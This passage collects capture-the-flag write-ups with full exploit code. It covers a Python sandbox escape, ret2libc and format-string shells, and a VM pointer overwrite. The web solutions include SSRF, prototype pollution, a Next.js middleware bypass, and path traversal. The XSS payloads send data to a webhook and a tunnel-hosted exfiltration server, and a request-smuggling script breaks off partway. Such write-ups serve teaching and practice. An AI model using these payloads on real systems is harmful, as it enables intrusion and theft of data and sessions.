# F-string bypasses AST validation (JoinedStr children not checked)
# Walk object hierarchy to recover builtins dict
# Use bytes path b'flag.txt' to bypass audit hook's isinstance(args[0], str) check
payload = (
    'f"{(B:=[c for c in ().__class__.__mro__[1].__subclasses__() '
    "if c.__init__.__class__.__name__=='function'][0]"
    ".__init__.__globals__['__builtins__']) "
    "and B['print'](B['open'](b'flag.txt').read())}\""
)

r = remote('pcalc.ctf.prgy.in', 1337, ssl=True)
r.recvuntil(b'>>> ')
r.sendline(payload.encode())
print(r.recvall(timeout=5).decode())
# Output: p_ctf{CHA7C4LCisJUst$HorTf0rcaLCUla70r}

Flag: p_ctf{CHA7C4LCisJUst$HorTf0rcaLCUla70r}

Dirty Laundry

Description

The washing machine doesn't seem to work. Could you take a look?

Binary with libc 2.35 provided. Connect via ncat --ssl dirty-laundry.ctf.prgy.in 1337.

Solution

Classic ret2libc buffer overflow. The vuln() function allocates a 0x40 (64) byte buffer but reads 0x100 (256) bytes via read(), giving a clean stack overflow with no canary and no PIE.

Binary protections: Partial RELRO, No canary, NX enabled, No PIE.

Strategy: Two-stage ROP chain:

Stage 1 — Leak libc: Overflow to call puts(GOT.puts) which prints the resolved libc address of puts, then return to vuln for a second input. A ret gadget is inserted before the return to vuln to fix 16-byte stack alignment (since ret-to-function differs from call).
Stage 2 — Shell: Calculate libc base from the leak, overflow again to call system("/bin/sh").

Key gadgets from the binary (no PIE, so addresses are fixed):

pop rdi; pop r14; ret at 0x4011a7
ret at 0x40101a

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./attachments/chal')
libc = ELF('./attachments/libc.so.6')

pop_rdi_r14 = 0x4011a7
ret = 0x40101a
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = elf.symbols['vuln']

p = remote('dirty-laundry.ctf.prgy.in', 1337, ssl=True)

# Stage 1: Leak libc via puts(GOT.puts), return to vuln
payload = b'A' * 0x40 + b'B' * 8
payload += p64(pop_rdi_r14) + p64(puts_got) + p64(0)
payload += p64(puts_plt)
payload += p64(ret) + p64(vuln)  # ret for stack alignment before vuln re-entry

p.sendafter(b'Add your laundry: ', payload)
p.recvuntil(b'Laundry complete')
puts_leak = u64(p.recvline().strip().ljust(8, b'\x00'))
libc.address = puts_leak - libc.symbols['puts']
log.info(f'Libc base: {hex(libc.address)}')

# Stage 2: system("/bin/sh")
payload2 = b'A' * 0x40 + b'B' * 8
payload2 += p64(pop_rdi_r14) + p64(next(libc.search(b'/bin/sh'))) + p64(0)
payload2 += p64(libc.symbols['system'])

p.sendafter(b'Add your laundry: ', payload2)
p.sendline(b'cat flag*')
p.interactive()

Flag: p_ctf{14UnDryHASbEenSUCces$fU11YCOMP1e73d}

Talking Mirror

Description

A 64-bit ELF reads a line with fgets(buf, 0x64, stdin) and then calls printf(buf) followed by exit(0). The goal is to print flag.txt via the provided win() function.

Solution

The bug is a classic format-string vulnerability (printf(buf)) with NX enabled. The obvious exploit is to overwrite exit@GOT with win, but every .got.plt address is 0x400a** and therefore contains a 0x0a byte; fgets() stops at newline, so you cannot place any .got.plt pointer directly in the input.

Key observation: the first PT_LOAD segment is RW and contains .dynsym and .rela.plt at fixed addresses (no PIE), and those addresses do not contain 0x0a. We can avoid writing to .got.plt entirely by redirecting lazy binding:

exit@plt triggers the dynamic linker (_dl_fixup) using the exit relocation entry in .rela.plt.
That relocation’s r_info encodes the symbol index. For exit, the symbol index is 10.
If we change the symbol index to 11 (stdout) in that relocation, the exit@plt call will resolve the symbol stdout instead of exit.
stdout (dynsym index 11) is one of the few symbols actually present in the executable’s .gnu.hash (symoffset=11), so _dl_lookup_symbol_x will find the executable’s stdout definition.
Patch dynsym[11].st_value to the address of win (0x401216). Now “resolving stdout” returns win.
When vuln() calls exit(0), the resolver jumps to win(), which prints the flag and _exit(0)s.

Concrete writes (all to the RW first segment):

.rela.plt exit entry is at 0x400638 + 7*24 = 0x4006e0.
- r_info is at 0x4006e8.
- The symbol index (high 32 bits) is stored at 0x4006ec; write 0x0b to make it symbol 11.
.dynsym base is 0x4003d8, entry size 24.
- dynsym[11] starts at 0x4003d8 + 11*24 = 0x4004e0.
- st_value is at 0x4004e8; write 0x401216 (done as two %hn writes: 0x0040 at 0x4004ea and 0x1216 at 0x4004e8).

Exploit code (single shot):

#!/usr/bin/env python3
from pwn import *
import struct

context.log_level = "error"

HOST = "talking-mirror.ctf.prgy.in"
PORT = 1337

# Patch exit@plt relocation's symbol index to 11 (stdout)
# and patch dynsym[11] (stdout) st_value to win (0x401216).
REL_SYM_BYTE     = 0x4006ec  # .rela.plt[exit].r_info high-dword (little-endian), write 0x0b here
STDOUT_STVAL_LO  = 0x4004e8  # dynsym[11].st_value low halfword
STDOUT_STVAL_HI  = 0x4004ea  # dynsym[11].st_value next halfword

addrs = [
    REL_SYM_BYTE,
    STDOUT_STVAL_HI,
    STDOUT_STVAL_LO,
]

# Print-count plan:
# 1) print 11 chars, write 0x0b via %hhn
# 2) print +53 => total 64, write 0x0040 via %hn
# 3) print +4566 => total 4630 (0x1216), write 0x1216 via %hn
fmt_t = "%1$11c%{rel}$hhn%1$53c%{hi}$hn%1$4566c%{lo}$hn"

fmt = fmt_t
while True:
    raw = fmt.encode() + b"\x00"
    pad = (-len(raw)) % 8
    base = 6 + (len(raw) + pad) // 8  # stack args start at position 6
    pos = {"rel": base + 0, "hi": base + 1, "lo": base + 2}
    new_fmt = fmt_t.format(**pos)
    if new_fmt == fmt:
        break
    fmt = new_fmt

raw = fmt.encode() + b"\x00"
pad = (-len(raw)) % 8
payload = raw + (b"A" * pad) + b"".join(struct.pack("<Q", a) for a in addrs) + b"\n"

io = remote(HOST, PORT, ssl=True, sni=HOST)
io.recvline(timeout=3)
io.send(payload)
print(io.recvall(timeout=3).decode(errors="replace"))

TerViMator

Description

Skynet is rising. Can you defeat this early version of the T-1000s mainframe before it becomes unstoppable?

ncat --ssl tervimator.ctf.prgy.in 1337

A stripped PIE binary (Full RELRO, NX, no canary) implementing a custom bytecode VM. Binary protections:

PIE enabled (randomized base)
Full RELRO (GOT not writable)
NX enabled (no shellcode)
No stack canary

Solution

Reverse Engineering the VM:

The binary reads up to 0x1000 bytes of bytecode, then executes a custom VM with 16 32-bit registers, 7 opcodes, and 9 syscalls.

Opcodes (0-6):

Opcode

Name

Format

Description

HALT

00

Stop execution

LOADI

01 reg imm32

regs[reg] = imm32

MOV

02 dst src

regs[dst] = regs[src]

ADD

03 dst src

regs[dst] += regs[src]

SUB

04 dst src

regs[dst] -= regs[src]

XOR

05 dst src

regs[dst] ^= regs[src]

SYSCALL

06

Dispatch on regs[0]

Syscalls (regs[0] = 1-9):

Name

Args

Description

alloc_data

size=r1

Allocate data object (perm=rw, type=1)

alloc_exec

task=r1

Allocate exec object (perm=x, type=2), stores func_ptr ^ KEY

Free objects with refcount=0

split

obj=r1

refcount += 2

name

obj=r1, len=r2

Read len bytes from stdin into &objects[obj] (max 0x40)

write_byte

obj=r1, off=r2, val=r3

Write byte at &obj + 0x10 + off (requires perm & 2)

inspect

obj=r1, off=r2

Print byte at &obj + 0x10 + off (requires perm & 1)

execute

obj=r1

Decode ptr ^ KEY and call it (requires perm & 4, type=2)

dup

obj=r1

refcount += 1

Object struct (24 bytes each, 16 max, at BSS offset 0x5040):

+0x00: 8 bytes padding
+0x08: 1 byte permissions (1=read, 2=write, 4=exec)
+0x09: 1 byte type (0=free, 1=data, 2=exec)
+0x0a: 1 byte refcount
+0x0c: 4 bytes size
+0x10: 8 bytes pointer (heap data ptr or XOR-encoded function ptr)

Win function at offset 0x129d: calls puts("CRITICAL: PRIVILEGE ESCALATION.") then system("/bin/sh").

Vulnerabilities:

No bounds check on inspect/write_byte offset - The inspect and write_byte syscalls access &objects[obj] + 0x10 + offset with no bounds validation on offset, allowing read/write into adjacent object structs.
Name syscall overwrites object struct - The name syscall writes raw bytes starting at &objects[obj] (the struct base), not the heap buffer. With len up to 0x40 (64 bytes), this overflows into subsequent objects' structs (each 24 bytes).

Exploit Strategy:

Allocate data object 0 (type=1, perm=rw) and exec object 1 (type=2, perm=x)
Use inspect(obj=0, offset=24..31) to read object 1's XOR-encoded function pointer through the out-of-bounds read (no bounds check on offset)
Decode the leak: alloc_data_addr = stored ^ KEY, compute win_addr = alloc_data_addr - 0x141
Use name(obj=0, len=48) to overwrite both objects' structs from stdin, setting object 1's pointer to win_addr ^ KEY
execute(obj=1) decodes the pointer and calls the win function

#!/usr/bin/env python3
from pwn import *
import time

context.log_level = 'info'

HALT, LOADI, MOV_OP, ADD_OP, SUB_OP, XOR_OP, SYSCALL = range(7)
SYS_ALLOC_DATA, SYS_ALLOC_EXEC = 1, 2
SYS_NAME, SYS_INSPECT, SYS_EXECUTE = 5, 7, 8
KEY = 0x1a5bfe810dce5825

def loadi(reg, val):
    return bytes([LOADI, reg]) + p32(val)

bc = b""
# alloc_data(16) -> obj 0
bc += loadi(0, SYS_ALLOC_DATA) + loadi(1, 16) + bytes([SYSCALL])
# alloc_exec(task=1) -> obj 1 (stores XOR(alloc_data_addr, KEY))
bc += loadi(0, SYS_ALLOC_EXEC) + loadi(1, 1) + bytes([SYSCALL])
# inspect obj 1's XORed pointer via obj 0 (offsets 24-31)
for i in range(8):
    bc += loadi(0, SYS_INSPECT) + loadi(1, 0) + loadi(2, 24+i) + bytes([SYSCALL])
# name(obj=0, len=48) to overwrite obj 0+1 structs from stdin
bc += loadi(0, SYS_NAME) + loadi(1, 0) + loadi(2, 0x30) + bytes([SYSCALL])
# execute(obj=1) - calls decoded function pointer
bc += loadi(0, SYS_EXECUTE) + loadi(1, 1) + bytes([SYSCALL])
bc += bytes([HALT])

p = remote("tervimator.ctf.prgy.in", 1337, ssl=True)
p.recvuntil(b"bytecode..."); p.recvline()
p.send(bc)
p.recvuntil(b"Executing..."); p.recvline()
p.recvuntil(b"alloc_data"); p.recvline()
p.recvuntil(b"alloc_exec"); p.recvline()

# Parse leaked bytes
leaked = []
for i in range(8):
    p.recvuntil(b"0x")
    leaked.append(int(p.recvline().strip(), 16))

stored = int.from_bytes(bytes(leaked), 'little')
alloc_data_addr = stored ^ KEY
win_addr = alloc_data_addr - (0x13de - 0x129d)
stored_new = win_addr ^ KEY
log.info(f"PIE base: {hex(alloc_data_addr - 0x13de)}, win: {hex(win_addr)}")

p.recvuntil(b"Reading"); p.recvline()

# Build 48-byte overwrite: obj 0 struct (24B) + obj 1 struct (24B)
data  = b"\x00"*8 + bytes([3,1,1,0]) + p32(16) + p64(0)        # obj 0: data, rw
data += b"\x00"*8 + bytes([4,2,1,0]) + p32(0)  + p64(stored_new) # obj 1: exec, win ptr
p.send(data)

time.sleep(0.5)
p.sendline(b"cat flag*")
print(p.recvall(timeout=5).decode(errors='replace'))

Flag: p_ctf{tErVIm4TOrT-1000ha$BE3nd3feaT3D}

web

Server OC

Description

Overclocking increases FPS, but for a SysAd, does it increase...Requests Per Second?

The flag is in two parts. Express.js web app simulating a server overclocking interface with a CPU multiplier control, benchmark functionality, and a logs endpoint.

URL: https://server-oc.ctf.prgy.in/

Solution

The challenge has two independent flag parts obtained through different vulnerabilities.

Reconnaissance:

GET /robots.txt reveals hardware info (CPU: i9-9900K, Motherboard: Asus Z390)
GET /script.js reveals the client-side flow: overclock → benchmark → leConfig → logs
POST /api/overclock with {"multiplier": 76} is the magic value that enables the benchmark button (showBe: true)
POST /leConfig issues a JWT cookie whose payload hints at the /logs endpoint and example payload {"Path": "C:\\Windows\\Log\\systemRestore"}
GET /api/benchmark/url returns the SSRF target URL

Flag Part 2 — SSRF endpoint direct access:

The /benchmark endpoint is an SSRF handler that fetches url query param server-side. However, it also checks for an internal query param directly. By passing internal=flag as a query parameter to the outer server (not inside the SSRF URL), the handler returns the second flag part directly:

curl 'https://server-oc.ctf.prgy.in/benchmark?internal=flag'
# Response: Flag : $h0ulD_N0T_T0uch_$3rv3rs}

Flag Part 1 — Prototype pollution on /logs:

The /logs endpoint requires:

A valid session (from POST /api/reset)
Overclock set to multiplier 76 (via POST /api/overclock)
A JWT token cookie (from POST /leConfig)
A JSON body with a Windows path

However, it returns "Invalid user permissions" even with all correct parameters. The bypass is JSON prototype pollution — injecting "__proto__": {"isAdmin": true} into the request body:

# Step 1: Reset session
curl -s -c cookies.txt -X POST 'https://server-oc.ctf.prgy.in/api/reset'

# Step 2: Overclock to 76
curl -s -b cookies.txt -c cookies.txt -X POST \
  -H 'Content-Type: application/json' \
  -d '{"multiplier":76}' \
  'https://server-oc.ctf.prgy.in/api/overclock'

# Step 3: Get JWT token
curl -s -b cookies.txt -c cookies.txt -X POST \
  'https://server-oc.ctf.prgy.in/leConfig'

# Step 4: Read logs with prototype pollution bypass
curl -s -b cookies.txt -X POST \
  -H 'Content-Type: application/json' \
  -d '{"Path":"C:\\Windows\\Log\\systemRestore","__proto__":{"isAdmin":true}}' \
  'https://server-oc.ctf.prgy.in/logs'
# Response: {"message":"p_ctf{L!qU1d_H3L1um_"}

Complete flag: p_ctf{L!qU1d_H3L1um_$h0ulD_N0T_T0uch_$3rv3rs}

("Liquid Helium Should Not Touch Servers" — a reference to extreme overclocking with liquid helium cooling)

Shadow Fight

Description

XSS challenge where the flag is hidden inside a closed Shadow DOM. A profile card generator takes name and avatar URL parameters, validates them with an isSafe() blocklist, and renders the name via innerHTML. An admin bot (HeadlessChrome/144) visits submitted profiles via a /review endpoint. The flag is in a closed shadow root on the admin's page:

const shadow = container.attachShadow({ mode: 'closed' });
shadow.innerHTML = '<p style="opacity: 0;">FLAG_HERE</p>';

Solution

Three key obstacles:

XSS with blocklist bypass: isSafe() blocks ", document, window, fetch, location, Function, constructor, prototype, from, char, escape, import, atob, btoa, and more. Name is limited to 50 chars.
Variable scoping in inline handlers: Inline event handlers (onload) have a with(document) scope chain, so avatar resolves to the <input id="avatar"> DOM element instead of the const avatar JS variable.
Closed Shadow DOM extraction: element.shadowRoot returns null for closed shadows, and getInnerHTML() was removed in Chrome 127+.

Bypass strategy:

Name field (47 chars): Use <svg/onload=...> with (0,eval)() (indirect eval) to escape the with(document) scope and access the const avatar variable from the global declarative environment:
```
<svg/onload=(0,eval)('eval(avatar.slice(24))')>
```
Avatar field: Smuggle the full JS payload in the URL path after https://picsum.photos/1/ (24-char prefix). The domain passes the allowlist check, and avatar.slice(24) extracts the payload at runtime.
Shadow DOM extraction: Override Element.prototype.attachShadow with a Proxy to capture shadow root references, then re-execute the shadow DOM creation script via (0,eval)(scriptTag.textContent). Use 'proto'+'type' and 'doc'+'ument' string concatenation to bypass the blocklist.

Full exploit:

import urllib.parse, requests

WEBHOOK = "https://webhook.site/YOUR-UUID"
TARGET = "https://shadow-fight.ctf.prgy.in"

name = "<svg/onload=(0,eval)('eval(avatar.slice(24))')>"

js_payload = (
    "try{"
    "var _r,p=Element['proto'+'type'],_o=p.attachShadow;"
    "p.attachShadow=new Proxy(_o,{apply:(t,a,b)=>{"
    "_r=Reflect.apply(t,a,b);return _r}});"
    "var d=self['doc'+'ument'],sc=d.querySelectorAll('script');"
    "for(var i=0;i<sc.length;i++)"
    "if(sc[i].textContent.indexOf('secret')>-1)"
    "{(0,eval)(sc[i].textContent);break};"
    "new Image().src='" + WEBHOOK + "?d='"
    "+encodeURIComponent(_r?_r.innerHTML:'nope')"
    "}catch(e){new Image().src='" + WEBHOOK + "?err='"
    "+encodeURIComponent(e+'')}"
)

avatar = "https://picsum.photos/1/" + js_payload

params = urllib.parse.urlencode({"name": name, "avatar": avatar})
r = requests.post(f"{TARGET}/review?{params}")
print(r.text)  # "We'll review your profile soon!"
# Check webhook for flag in ?d= parameter

How the Proxy trick works:

Element.prototype.attachShadow is wrapped in a Proxy that intercepts apply calls
The proxy captures the returned shadow root reference in _r (works for both open and closed shadows)
The original shadow DOM creation script is found via querySelectorAll('script') and re-executed with (0,eval)()
When the re-executed script calls attachShadow(), the proxy captures the new shadow root
After shadow.innerHTML = '<p>FLAG</p>' runs, _r.innerHTML contains the flag
The flag is exfiltrated via new Image().src to a webhook

Flag: p_ctf{uRi_iz_js_db76a80a938a9ce3}

Note Keeper

Description

A simple note-keeping application built with Next.js 15.1.1. The challenge asks "Can you reach what you're not supposed to?" The app has a guest-facing notes page, a login page, and a middleware-protected admin panel at /admin.

Solution

This challenge involves chaining two vulnerabilities: CVE-2025-29927 (Next.js middleware authorization bypass) and SSRF via Location header injection through NextResponse.next({headers: request.headers}).

Step 1: Reconnaissance

The app is a Next.js 15.1.1 application. The login link contains a base64-encoded state parameter L2FkbWlu = /admin. The /admin route returns 401 with .

Step 2: Middleware Bypass (CVE-2025-29927)

Next.js 15.1.1 is vulnerable to CVE-2025-29927, which allows bypassing middleware by setting the x-middleware-subrequest header. For Next.js 15.x, the middleware name must be repeated 5 times (recursion depth limit):

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  https://note-keeper.ctf.prgy.in/admin

This reveals the admin panel with 7 notes containing hints:

A pastebin link (https://pastebin.com/GNQ36Hn4) with the middleware source code
A base64 string WyIvc3RhdHMiLCAiL25vdGVzIiwgIi9mbGFnIiwgIi8iXQ== decoding to ["/stats", "/notes", "/flag", "/"] — backend API routes

Step 3: Analyzing the Middleware Source

The pastebin reveals the middleware code:

import { NextResponse } from "next/server";
import { isAdminFunc } from "./lib/auth";

export function middleware(request) {
  const url = request.nextUrl.clone();

  if (url.pathname.startsWith('/admin')) {
    const isAdmin = isAdminFunc(request);
    if (!isAdmin) {
      return new NextResponse(`<html>...Unauthorized...</html>`, { status: 401 });
    }
  }

  if (url.pathname.startsWith('/api')) {
    return NextResponse.next({
      headers: request.headers // VULNERABLE: forwards ALL request headers
    });
  }

  return NextResponse.next();
}

The critical vulnerability: for /api routes, the middleware calls NextResponse.next({headers: request.headers}), passing all incoming request headers into the middleware response.

Step 4: SSRF via Location Header Injection

The admin page's client-side JavaScript reveals the backend runs at http://backend:4000 with a /flag endpoint. This internal service is not directly accessible.

When NextResponse.next() receives headers including a Location header, Next.js interprets it as a server-side redirect and fetches the specified URL internally. By injecting a Location header pointing to the internal backend, we achieve SSRF:

curl -H "Location: http://backend:4000/flag" \
  https://note-keeper.ctf.prgy.in/api/login

This causes the Next.js server to fetch http://backend:4000/flag and return the response:

p_ctf{Ju$t_u$e_VITE_e111d821}

Flag: p_ctf{Ju$t_u$e_VITE_e111d821}

Domain Registrar

Description

A domain registrar website with KYC upload functionality. The site runs nginx + PHP/8.2.30 and has endpoints for listing domains (avlbl.php), uploading KYC documents (kyc.php), a flag endpoint (flag.php), and a checkout page with an XSS sink (checkout.html). The /public/ directory exists but returns 403 Forbidden.

Solution

The vulnerability is a path traversal via URL-encoded slash in the /public/ directory route.

Nginx routes requests to /public/ through a PHP handler for image extensions (.png, .jpg, .gif). However, using %2f (URL-encoded /) allows escaping the /public/ directory and traversing back to the webroot:

/public%2f../           → serves index.html (webroot root)
/public%2f../app.js     → serves app.js
/public%2f../nginx.conf → serves the flag file

The key insight is that nginx's location /public/ directive doesn't match /public%2f since the encoded slash isn't decoded at the routing stage, but the backend/filesystem does decode it when resolving the path. This mismatch allows directory traversal out of the /public/ prefix.

The flag was stored in a file named nginx.conf in the webroot:

curl -s "https://domain-registrar.ctf.prgy.in/nginx.conf"
# "p_ctf{c@n_nEVer_%ru$T_D0M@!nS_FR0m_p0Ps}"

# Also accessible via the traversal:
curl -s "https://domain-registrar.ctf.prgy.in/public%2f../nginx.conf"
# "p_ctf{c@n_nEVer_%ru$T_D0M@!nS_FR0m_p0Ps}"

Flag: p_ctf{c@n_nEVer_%ru$T_D0M@!nS_FR0m_p0Ps}

Shadow Fight 2

Description

XSS challenge with a closed Shadow DOM. A "Profile Card Generator" takes name and avatar query parameters. The name is rendered via innerHTML, and there's an admin bot that reviews submitted profiles. The flag is stored in a closed Shadow DOM that's only populated with the real flag when the admin views the page. A server-side filter (isSafe()) blocks dangerous keywords like document, window, fetch, location, Function, constructor, import, from, char, code, escape, %, ", etc. Name is limited to 50 characters.

Solution

Key observations:

The name parameter is reflected directly into a JavaScript string: const name = "VALUE";
While " is blocked (can't break the JS string), </script> is NOT blocked — the HTML parser closes the <script> tag when it encounters </script>, regardless of JS string context
The isSafe() filter runs server-side but doesn't block HTML tags like <script>
No Content-Security-Policy header exists, so external scripts can be loaded
The flag is in the page HTML source (inside a <script> tag that creates the Shadow DOM), readable via document.scripts[].textContent

Attack flow:

Set up an exfiltration server exposed via localhost.run SSH tunnel
Host a JS payload that reads the flag from the DOM and exfiltrates it
Inject </script><script src=//TUNNEL> as the name parameter — this closes the existing script tag and loads our external script
Submit the profile for admin review — the admin bot visits the page, our script executes, reads the flag from the script tag, and sends it to our server

Name parameter (49 chars, under 50 limit):

</script><script src=//f295e73be88189.lhr.life/x>

Exfiltration server (server.py):

#!/usr/bin/env python3
import http.server, urllib.parse, sys

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed = urllib.parse.urlparse(self.path)
        params = urllib.parse.parse_qs(parsed.query)
        if 'f' in params or 'd' in params:
            data = params.get('f', params.get('d', ['']))[0]
            print(f"\n[FLAG] {urllib.parse.unquote(data)}\n")
            with open('flag.txt', 'w') as fp:
                fp.write(urllib.parse.unquote(data))
        if parsed.path in ('/x', '/p'):
            self.send_response(200)
            self.send_header('Content-Type', 'application/javascript')
            self.send_header('Access-Control-Allow-Origin', '*')
            self.end_headers()
            with open('payload.js', 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(200)
            self.send_header('Access-Control-Allow-Origin', '*')
            self.end_headers()
            self.wfile.write(b'OK')

http.server.HTTPServer(('0.0.0.0', 8888), Handler).serve_forever()

XSS payload (payload.js):

(function(){
  var d = document;
  var base = 'https://f295e73be88189.lhr.life';

  // Read flag from script tags in page source
  var scripts = d.querySelectorAll('script');
  var flagData = '';
  for (var i = 0; i < scripts.length; i++) {
    var t = scripts[i].textContent || '';
    if (t.indexOf('shadow') !== -1 || t.indexOf('ctf') !== -1) {
      flagData += '|SCRIPT' + i + ':' + t.substring(0, 400);
    }
  }
  if (flagData) {
    new Image().src = base + '/?d=' + encodeURIComponent(flagData.substring(0, 1500));
  }

  // Also try regex match on full HTML
  var html = d.documentElement.innerHTML;
  var m = html.match(/p_ctf\{[^}]+\}/);
  if (m) new Image().src = base + '/?f=' + encodeURIComponent(m[0]);
})();

Exploit submission:

import requests, urllib.parse

name = '</script><script src=//f295e73be88189.lhr.life/x>'
avatar = 'https://picsum.photos/100'
params = urllib.parse.urlencode({'name': name, 'avatar': avatar})

# Trigger admin bot visit
requests.post(f'https://shadow-fight-2.ctf.prgy.in/review?{params}')

Why it works: The </script> injection breaks the existing script context at the HTML parser level — the filter checks for JS-dangerous keywords but doesn't block HTML structural elements. The external script loads without restrictions (no CSP), reads the flag from the DOM (it's in the script tag's text content, not locked inside the Shadow DOM), and exfiltrates via Image() request.

Flag: p_ctf{admz_nekki_kekw_c6e194c17f2405c5}

Picture This

Description

A social media platform where users can sign up and create profiles. Only "verified" users get the flag. Profiles are reviewed by automated bots before verification. The goal is to get verified and claim the gift.

Category: web | Points: 425 | Solves: 26

Solution

The application has a three-part vulnerability chain: a MIME type mismatch in the CDN, DOM clobbering to bypass verification logic, and an admin bot that visits user-controlled content.

1. MIME Type Mismatch (.jpg vs .jpeg)

In cdn.js, the content-type defaults to text/html and only overrides for specific extensions:

let ct = "text/html";  // default!
if (ext === ".png") ct = "image/png";
else if (ext === ".jpeg") ct = "image/jpeg";  // only .jpeg, NOT .jpg
else if (ext === ".webp") ct = "image/webp";

But in helpers.js, the validateImage function stores JPEG files with .jpg extension:

case "image/jpeg":
case "image/jpg":
    return [true, ".jpg"];

This means uploaded JPEG files get a .jpg extension, but the CDN serves them as text/html since .jpg !== ".jpeg".

2. DOM Clobbering the Verification Check

The admin bot visits /_image/{avatar}?uid={uid}, then injects admin-helper.js which contains:

if (!window.config) {
    window.config = { adminCanVerify: false }
}
// ...
if (!window.config.canAdminVerify) {
    action = "reject"
}

Note the typo: the default sets adminCanVerify but the check reads canAdminVerify — always undefined (falsy) normally, forcing rejection. But since our JPEG is served as HTML, we embed a DOM clobbering payload:

<form id="config"><input name="canAdminVerify" value="1"></form>

This creates window.config (the form element, truthy) and window.config.canAdminVerify (the input element, truthy), bypassing the rejection. CSP is default-src 'self' which blocks inline scripts, but DOM clobbering requires no JavaScript execution.

3. Exploit Flow

Create a minimal valid JPEG (passes file-type magic byte check) with HTML appended after the EOI marker
Upload as avatar — stored as uuid.jpg
Request verification — bot visits /_image/uuid.jpg which is served as text/html
Browser parses embedded HTML, DOM clobbering sets window.config.canAdminVerify to truthy
admin-helper.js submits action=verify instead of action=reject
User gets verified, flag appears on profile page

Exploit Script (solve.py):

#!/usr/bin/env python3
import requests
import time
import uuid
import re
import html
import sys

BASE = "https://picture.ctf.prgy.in"
USERNAME = f"solver_{uuid.uuid4().hex[:8]}"
PASSWORD = "password123"

def create_malicious_jpeg():
    # Minimal JPEG: SOI + APP0 (JFIF) + EOI
    jpeg = bytearray([0xFF, 0xD8])
    jpeg += bytearray([
        0xFF, 0xE0, 0x00, 0x10,
        0x4A, 0x46, 0x49, 0x46, 0x00,  # "JFIF\0"
        0x01, 0x01, 0x00,
        0x00, 0x01, 0x00, 0x01,
        0x00, 0x00,
    ])
    jpeg += bytearray([0xFF, 0xD9])  # EOI
    # DOM clobbering payload after JPEG data
    html_payload = b'\n<html><body>'
    html_payload += b'<form id="config"><input name="canAdminVerify" value="1"></form>'
    html_payload += b'</body></html>'
    return bytes(jpeg) + html_payload

s = requests.Session()

# Register + Login
s.post(f"{BASE}/register", data={"username": USERNAME, "password": PASSWORD})
s.post(f"{BASE}/login", data={"username": USERNAME, "password": PASSWORD})

# Upload malicious JPEG avatar
jpeg_data = create_malicious_jpeg()
s.post(f"{BASE}/profile", data={"display_name": "x"},
       files={"avatar": ("e.jpg", jpeg_data, "image/jpeg")})

# Trigger bot verification
s.post(f"{BASE}/verify")

# Wait for approval
time.sleep(6)

# Get flag from profile
r = s.get(f"{BASE}/profile")
match = re.search(r'class="flag">(.*?)</span>', r.text)
if match:
    print(f"FLAG: {html.unescape(match.group(1))}")

Flag: p_ctf{i_M!ss#d_Th#_JPG_5f899f05}

Crossing Boundaries

Description

The target is a blog app behind a “front proxy” and a custom caching TCP proxy. The cache proxy caches GET /blogs/<id> responses. The admin bot can be triggered to review a user blog and it makes a privileged request carrying an admin session cookie; the goal is to obtain /flag.

Solution

The cache proxy has a request-desync bug on cache hits:

It checks the cache and, on a HIT, immediately returns the cached response and continues the loop.
It does this before reading the request body (Content-Length bytes).

So if we send a cache-hit request:

GET /blogs/<cached> with a Content-Length and a body
The proxy returns the cached blog without consuming the body
The leftover body bytes are parsed as the next HTTP request on the same upstream TCP connection

To steal the admin cookie without relying on “response stealing”, we smuggle an incomplete inner request:

Outer (carrier) request: GET /blogs/<cached> (cache HIT) with Content-Length: len(inner_bytes)
Inner request (parsed by cache proxy as request #2): POST /my-blogs/create with a large Content-Length for its body, but we only send the prefix content=<marker> and stop.
The cache proxy blocks waiting for the missing body bytes.

After we “request review” on one of our blogs, the admin bot waits 10s then performs:

GET /admin/blogs/<blogID> with Cookie: session=<AdminSessionID> and User-Agent: AdminBot/1.0

Because the front proxy reuses upstream connections and routes the admin bot request into the same isolation bucket, the admin bot’s request bytes are consumed as the missing POST body. The backend then stores those bytes as the new blog’s content. We fetch that blog and extract the admin session cookie from the captured headers, then call /flag with it.

Exploit code (end-to-end):

#!/usr/bin/env python3
import re
import ssl
import socket
import time
import uuid
import urllib.parse

import requests


HOST = "crossing-boundaries.ctf.prgy.in"
BASE = "https://" + HOST
PORT = 443

# Any published blog UUID from the homepage (must be cached HIT)
CARRIER_BLOG_ID = "c2e38584-480c-4397-9776-9ceabcfd4e06"


def die(msg: str) -> None:
    raise SystemExit(msg)


def mk_user() -> tuple[str, str]:
    # Username: >= 8 chars
    username = "solve_" + uuid.uuid4().hex[:10]
    # Password: >= 20 chars
    password = "solve_password_" + uuid.uuid4().hex + uuid.uuid4().hex
    return username, password


def list_my_blog_ids(sess: requests.Session) -> list[str]:
    r = sess.get(
        BASE + "/my-blogs",
        headers={"Connection": "close", "Accept-Encoding": "identity"},
        timeout=15,
    )
    r.raise_for_status()
    return list(dict.fromkeys(re.findall(r"/my-blogs/([a-f0-9-]{36})", r.text)))


def get_my_blog_content(sess: requests.Session, blog_id: str) -> str:
    r = sess.get(
        BASE + f"/my-blogs/{blog_id}",
        headers={"Connection": "close", "Accept-Encoding": "identity"},
        timeout=15,
    )
    r.raise_for_status()
    m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL | re.IGNORECASE)
    return m.group(1).strip() if m else ""


def prime_cache() -> None:
    # Best-effort: ensure /blogs/<carrier> is a cache HIT. Cache is global.
    for _ in range(3):
        r = requests.get(BASE + f"/blogs/{CARRIER_BLOG_ID}", timeout=15)
        if r.headers.get("x-cache", "").upper() == "HIT":
            return
        time.sleep(0.2)
    # Not fatal (might already be cached but header stripped), but warn.
    print("[!] Could not confirm x-cache HIT while priming; continuing anyway.")


def tls_send(payload: bytes, recv_bytes: int = 4096, timeout: float = 5.0) -> bytes:
    ctx = ssl.create_default_context()
    raw = socket.create_connection((HOST, PORT), timeout=10)
    with ctx.wrap_socket(raw, server_hostname=HOST) as s:
        s.settimeout(timeout)
        s.sendall(payload)
        try:
            return s.recv(recv_bytes)
        except Exception:
            return b""


def poison_waiting_post(user_session: str, marker: str, inner_body_len: int) -> None:
    """
    Outer request (cache HIT): GET /blogs/<carrier> with a body.
    Body contains an inner request (POST /my-blogs/create) whose declared Content-Length
    is larger than the bytes we provide. The proxy will block waiting for the remainder,
    and the admin bot's next request bytes (on the same upstream connection) will be
